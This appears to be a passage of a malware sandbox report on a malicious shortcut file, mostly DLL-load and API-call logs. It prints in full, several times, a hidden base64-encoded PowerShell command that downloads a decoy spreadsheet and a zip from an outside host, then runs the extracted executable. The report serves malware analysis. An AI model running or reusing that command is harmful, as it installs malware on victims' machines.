Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apisethost.appexecutionalias.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: daxexec.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: fltlib.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: container.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: capauthz.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	Section loaded: windows.storage.applicationdata.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	Section loaded: twinapi.appcore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	Section loaded: wintypes.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	Section loaded: wldp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	Section loaded: propsys.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\AppData\Local\Temp\a.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: S5dpmRJg30.lnk

LNK file: ..\..\..\..\..\..\..\..\Windows\System32\cmd.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcm

Suspicious command line found

Source: unknown

Process created: "C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression"

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) \| Invoke-Expression"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) \| Invoke-Expression"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_009E5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_009E5D78

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFC3DA59665 pushad ; ret	2_2_00007FFC3DA5969D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFC3DA574FD push cs; retf	2_2_00007FFC3DA5751A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFC3DA500BD pushad ; iretd	2_2_00007FFC3DA500C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFC3DA53445 push esp; ret	2_2_00007FFC3DA5366A
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A30332 push edi; ret	5_2_00A30333
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A00E06 push ecx; ret	5_2_00A00E19

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\a.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A725A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		5_2_00A725A0
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_009FFC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		5_2_009FFC8A

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
